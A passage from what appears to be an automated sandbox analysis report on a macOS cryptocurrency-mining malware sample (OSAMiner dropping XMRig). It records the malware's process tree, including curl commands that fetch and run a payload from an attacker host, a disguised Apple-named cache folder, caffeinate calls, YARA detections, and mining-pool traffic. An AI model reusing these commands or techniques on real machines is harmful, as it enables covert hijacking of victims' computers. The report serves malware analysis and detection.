          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -i &> /dev/null & echo $!
            • sh New Fork (PID: 570, Parent: 569)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -i
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -m &> /dev/null & echo $!
            • sh New Fork (PID: 572, Parent: 571)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -m
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -s &> /dev/null & echo $!
            • sh New Fork (PID: 574, Parent: 573)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -s
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
            • sh New Fork (PID: 577, Parent: 576)
            • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
            • sh New Fork (PID: 578, Parent: 576)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches/com.apple.R0
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c system_profiler SPHardwareDataType
          • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: system_profiler SPHardwareDataType
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c [ -e ~/library/Caches/com.apple.R0/ssl4.plist ] && echo true || echo false
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/ssl.zip -o ~/library/Caches/com.apple.R0/ssl.zip
          • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/bin/ditto -xk ~/library/Caches/com.apple.R0/ssl.zip ~/library/Caches/com.apple.R0
          • ditto (MD5: 5e90ed3b53d4ac63096f6727363249c5) Arguments: /usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/library/Caches/com.apple.R0/ssl.zip
          • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c cd ~/library/Caches/com.apple.R0 ~/library/Caches/com.apple.R0/ssl4.plist &> /dev/null & exit
            • sh New Fork (PID: 596, Parent: 595)
            • ssl4.plist (MD5: deb6c97315615faa44a0ac07244e7570) Arguments: /Users/henry/library/Caches/com.apple.R0/ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/11.png
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/11.png
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
gqnmir4Hus | JoeSecurity_OSAMiner | Yara detected OSAMiner | Joe Security | (none)

Dropped Files

Source | Rule | Description | Author | Strings
/Users/henry/Library/11.png | JoeSecurity_OSAMiner | Yara detected OSAMiner | Joe Security | (none)
/Users/henry/Library/Caches/com.apple.R0/config.txt | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | (none)
/Users/henry/Library/Caches/com.apple.R0/cpu.txt | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | (none)
/Users/henry/Library/Caches/com.apple.R0/pools.txt | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | (none)
/Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | (none)

Signature Overview

Bitcoin Miner:

Yara detected OSAMiner
  Source: Yara match; File source: gqnmir4Hus, type: SAMPLE
  Source: Yara match; File source: /Users/henry/Library/11.png, type: DROPPED
Yara detected Xmrig cryptocurrency miner
  Source: Yara match; File source: /Users/henry/Library/Caches/com.apple.R0/config.txt, type: DROPPED
  Source: Yara match; File source: /Users/henry/Library/Caches/com.apple.R0/cpu.txt, type: DROPPED
  Source: Yara match; File source: /Users/henry/Library/Caches/com.apple.R0/pools.txt, type: DROPPED
  Source: Yara match; File source: /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG, type: DROPPED
Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping, indicative of miners
  Source: /bin/sh (PID: 568); Caffeinate executable: /usr/bin/caffeinate caffeinate -d
  Source: /bin/sh (PID: 570); Caffeinate executable: /usr/bin/caffeinate caffeinate -i
  Source: /bin/sh (PID: 572); Caffeinate executable: /usr/bin/caffeinate caffeinate -m
  Source: /bin/sh (PID: 574); Caffeinate executable: /usr/bin/caffeinate caffeinate -s
Found strings related to Crypto-Mining
  Source: .BC.T_brE6fG.340.dr; String found in binary or memory: pools.txt
  Source: .BC.T_brE6fG.340.dr; String found in binary or memory: Cryptonight hash self-test NOT defined for POW %s
  Source: global traffic; TCP traffic: 192.168.0.50:49243 -> 43.249.204.231:8080
  Source: global traffic; TCP traffic: 192.168.0.50:49247 -> 185.134.22.134:14441
  Source: unknown; TCP traffic detected without corresponding DNS query: 17.253.57.205
  Source: unknown; TCP traffic detected without corresponding DNS query: 17.253.57.205
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-zip-compressedLast-Modified: Thu, 23 Jan 2020 07:29:43 GMTAccept-Ranges: bytesETag: "f0a08ee1bed1d51:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 15 Jan 2021 10:00:49 GMTContent-Length: 1629446Data Raw: 50 4b 03 04 0a 00 00 00 00 00 68 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 08 00 10 00 6f 70 65 6e 73 73 6c 2f 55 58 0c 00 24 68 25 5e 24 68 25 5e f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 84 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 55 58 0c 00 58 68 25 5e 58 68 25 5e f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 1d 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 21 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 6c 69 62 63 72 79 70 74 6f 2e 31 2e 30 2e 30 2e 64 79 6c 69 62 55 58 0c 00 9a 67 25 5e 9a 67 25 5e f5 01 14 00 ec bd 0b 7c 54 d5 b5 30 3e 93 4c 92 09 99 b0 07 89 18 35 40 d0 68 c1 a2 e6 38 68 a1 45 9b 03 33 72 06 67 20 15 10 ab 20 28 12 b1 02 49 21 11 ed 95 e7 24 9a dd e3 68 ea ab f4 5a af b4 b5 b7 f6 71 bf 8b da a6 88 15 67 02 e4 85 40 c2 23 84 57 12 de 13 02 4c 20 3c c2 2b f3 ad b5 f6 99 67 c2 43 7b ef f7 ff fd fe bf 06 66 ce 7e ae bd d6 da eb b5 f7 d9 e7 cc e6 0b c7 bb 92 74 3a 7d bc 4e a7 4b 84 4f 2a 7c 3c 90 28 d1 99 75 f8 77 33 7c 06 c7 e9 74 d3 a6 4d b4 3d 3e 51 d7 fd 6f c9 ad 3d e6 13 b4 4f a2 56 3c 6d 5a e1 cc 97 0a c3 cd ba c1 13 c3 e9 66 0d bf 29 94 37 45 c2 35 e8 96 44 66 a7 4d 9b 5f 58 f4 cc fc 2b c2 9b a5 08 38 89 f1 e1 bc 3e a2 bf 51 83 17 c6 0f e1 4d 9b 35 73 76 c1 cc 79 3d c0 2b 78 44 c0 bb 25 21 9c 8f bb 2a 7e 33 f2 e7 ce 2f 8c c8 47 c3 f3 e4 0a 78 d5 e3 e2 42 f9 44 dd 95 ff 00 de fc c2 79 cf cf 7d ee 0a f0 ca 3e bc 99 ae 07 ff a4 0f e5 0d 11 fd a3 70 a5 fe 45 73 17 3c 3f f7 d9 69 cf cf cd cb ef 01 5e e1 58 31 8f cb 87 86 f3 b1 30 22 ff 70 f4 6a 92 13 ab 3c 51 8e a8 08 ca 47 4b 5c 74 7e a5 c8 c7 6b 1f 63 08 af b9 b3 a7 cd 7f 79 ce 33 f9 b3 a7 15 14 ce bb 22 3c 63 44 3e 3e a2 1a 79 
b8 34 8a ce e7 f2 0b a3 f2 d1 f0 8c 1a bc 15 11 f9 58 78 cb a2 fa cf 7e fa 6a f8 7d 1c c4 cf 10 ce 47 c2 03 5d d3 bd 17 05 6f 4e 3e 4e c2 f3 85 d3 f2 8a e6 ce e8 06 6f 65 71 34 bd 98 8f 84 97 ac 8b fe eb 2e 77 d1 f0 3c 1a bc e9 3f 8f 0b e5 0d ba 2b ff 4d 9b f6 ec d3 85 4f 47 e6 a3 e1 65 b2 01 74 35 df 1c ce 5f 1d de 33 f3 e7 47 e5 a3 e1 65 0f 16 f0 72 ee 0b 97 45 c2 8b d4 61 d1 7f 46 fe 9c 39 f9 73 af 04 af e0 09 01 2f 3b a2 4f 24 ff 62 e1 21 19 0a c1 71 d8 c7 3d 62 b3 da 83 3a 31 7d 80 96 d0 b4 34 5b e4 87 06 12 42 70 22 61 a1 1d 9d 0e 9f f4 60 b9 5e 4f 9f 9c 99 2f cd 9c 51 54 f8 f4 33 b3 67 4e 2b 78 ba 70 d6 bd f9 05 33 e7 ce 9f 3f fb de d9 cf 3f 83 9f 19 f3 5e 2e 28 cc bf 47 ba 27 1b fe 3d fb 32 94 e8 7a fc bb 0d 24 3f 5b c3 43 c9 04 9c 73 07 e8 5e 8a a8 f7 40 be 1a 84 a6 f4 c7 03 74 b3 de d6 93 ee 22 2e ed e6 4c 9d da 5f a7 bb 74 7c 90 2e 5b 8e d3 a5 40 59 ae d6 e7 b8 51 7c d2 d3 c0 76 43 9b 57 7b 1e 9a fe 56 b4 0e d2 dd 14 cb 3c f8 bb 55 1b e7 e7 23 d8 c4 5f 8f fe 7e bf 4f 7e d5 ff f9 27 fa 6e 74 65 e9 34 13 9f dc 4b a7 e
  Source: global traffic; HTTP traffic detected: GET / HTTP/1.1; Host: www.budaybu100001.com:8080; User-Agent: curl/7.54.0; Accept: */*
  Source: global traffic; HTTP traffic detected: GET /budaybu.png HTTP/1.1; Host: budaybu.com:8080; User-Agent: curl/7.54.0; Accept: */*
  Source: global traffic; HTTP traffic detected: GET /ssl.zip HTTP/1.1; Host: budaybu.com:8080; User-Agent: curl/7.54.0; Accept: */*
  Source: unknown; DNS traffic detected: queries for: www.budaybu100001.com
  Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596); Reads from socket in process: data
  Source: .BC.T_brE6fG.340.dr; String found in binary or memory: https://github.com/fireice-uk/cryptonote-speedup-demo
  Source: .BC.T_brE6fG.340.dr; String found in binary or memory: https://ryo-currency.com
  Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596); Writes from socket in process: data